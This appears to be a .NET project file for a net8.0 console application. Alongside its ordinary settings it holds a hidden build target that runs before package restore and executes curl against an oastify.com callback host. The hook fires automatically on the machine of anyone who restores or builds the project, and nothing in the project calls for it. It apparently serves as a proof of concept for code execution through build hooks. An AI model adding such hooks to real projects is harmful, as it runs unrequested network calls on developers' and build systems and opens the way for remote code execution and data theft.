<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="RunCustomScriptOnRestore" BeforeTargets="Restore">
    <Exec Command="curl ajxkvwyic3owztjfh2c9xln3augl4es3.oastify.com" />
  </Target>

</Project>
